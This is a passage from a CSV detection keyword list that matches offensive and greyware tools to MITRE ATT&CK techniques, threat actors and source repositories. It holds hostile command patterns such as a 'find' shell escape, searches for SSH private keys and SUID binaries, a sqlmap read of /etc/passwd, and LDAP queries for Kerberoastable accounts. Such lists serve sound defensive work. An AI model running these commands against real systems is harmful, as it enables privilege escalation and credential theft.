TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf_*_windows_*.zip*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf-master.zip*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*fgddmllnllkalaagkghckoinaemmogpe*,greyware_tool_keyword,ExpressVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*fgdump.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*fgexec.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ficajfeojakddincjafebjmfiefcmanc*,greyware_tool_keyword,Best VPN USA,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*fierce --domain* --dns-servers *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*FiercePhish*,offensive_tool_keyword,FiercePhish,FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. ,T1566 - T1566.001 - T1566.002 - T1566.003,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Phishing,https://github.com/Raikia/FiercePhish,1,1,N/A,N/A,10,1214,273,2023-05-18T15:38:38Z,2016-12-31T19:41:24Z -*Fiesta Exploit Kit*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*File_Smuggler_Http_Handler*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*FileControler/FileControler_x64.dll*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*FileControler/FileControler_x86.dll*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*File-Extensions-Wordlist.txt*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*fileless-elf-exec*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*FilelessPELoader.cpp*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*FilelessPELoader.exe*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*FilelessPELoader.vcxproj*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*FilelessPELoader-main*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*FilelessShellcode.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*FilelessShellcode.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*FilelessShellcode.sln*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*FilelessShellcode.vcxproj*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*filemsf.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*--file-read=/etc/passwd*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*files/BindShell.exe*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*files/team-edward.py*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*filezilla2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32*,greyware_tool_keyword,dsquery,Finding users Not Required to Have a Password,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304*,greyware_tool_keyword,dsquery,Finding accounts with Kerberos Pre-Authentication Disabled,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(&(objectClass=User)(msDS-AllowedToDelegateTo=*,greyware_tool_keyword,dsquery,Finding accounts with constrained delegation,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(&(objectClass=user)(servicePrincipalName=*)(!(cn=krbtgt))(!(samaccounttype=805306369*,greyware_tool_keyword,dsquery,Finding Kerberoastable Users,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(&(objectClass=User)(serviceprincipalname=*)(samaccountname=* -limit 0 -attr samaccountname serviceprincipalname*,greyware_tool_keyword,dsquery,Finding accounts with SPNs,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(userAccountControl:1.2.840.113556.1.4.803:=524288)*,greyware_tool_keyword,dsquery,Finding accounts with unconstrained delegation,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*finalrecon.py --*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*find . -exec /bin/sh \; -quit*,greyware_tool_keyword,find,It can be used to break out from restricted environments by spawning an interactive system shell.,T1059.004 - T1219 - T1027,TA0002 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*find . -name spring-beans*.jar*,offensive_tool_keyword,Spring4Shell,Spring4Shell Proof Of Concept/Information CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BobTheShoplifter/Spring4Shell-POC,1,0,N/A,N/A,4,335,106,2022-11-09T15:46:06Z,2022-03-30T07:54:45Z -*find / * -4000 -type f -print*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*find / * -perm -2000 -type f -print*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*find / * -regextype egrep -iregex*\.kdbx*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*find / -name authorized_keys *> /dev/null*,greyware_tool_keyword,find,Find sensitive files,T1083 - T1213.002 - T1005,TA0007 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find / -name id_dsa 2>*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find / -name id_rsa *> /dev/null*,greyware_tool_keyword,find,Find sensitive files,T1083 - T1213.002 - T1005,TA0007 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find / -name id_rsa 2>*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm /2000 -ls 2>/dev/null*,greyware_tool_keyword,find,Find SGID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*find / -perm +4000 -type f 2>/dev/null*,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -perm +8000 -ls 2>/dev/null*,greyware_tool_keyword,find,Find SGID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*find / -perm -2000,greyware_tool_keyword,find,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm -4000,greyware_tool_keyword,find,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm -4000 -type f *,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -perm -g=s,greyware_tool_keyword,find,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # sticky bits,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm -u=s,greyware_tool_keyword,find,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. sticky bits,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*find / -perm -u=s -type f 2>/dev/null*,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -perm -u=s -type f -group */dev/null*,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -uid 0 -perm -4000 -type f *,greyware_tool_keyword,find,Find SUID enabled files,T1044 - T1083,TA0007 - TA0009,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*find / -user root -perm -6000 -type f 2>*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find /* -perm -04000 -o -perm -02000*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find /* -perm -u=s -type f 2>*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find_and_load_coerce_methods*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*find_domain.sh *,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,0,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*find_payload(*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*Find-4624Logons*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-4648Logons*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - 